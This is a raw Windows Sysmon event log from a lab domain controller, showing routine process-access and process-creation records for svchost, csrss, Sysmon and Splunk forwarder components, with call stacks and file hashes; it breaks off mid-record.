13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.281{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.077{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.061{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.061{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.905{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:48.765{59A5CD1D-9184-6005-B802-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 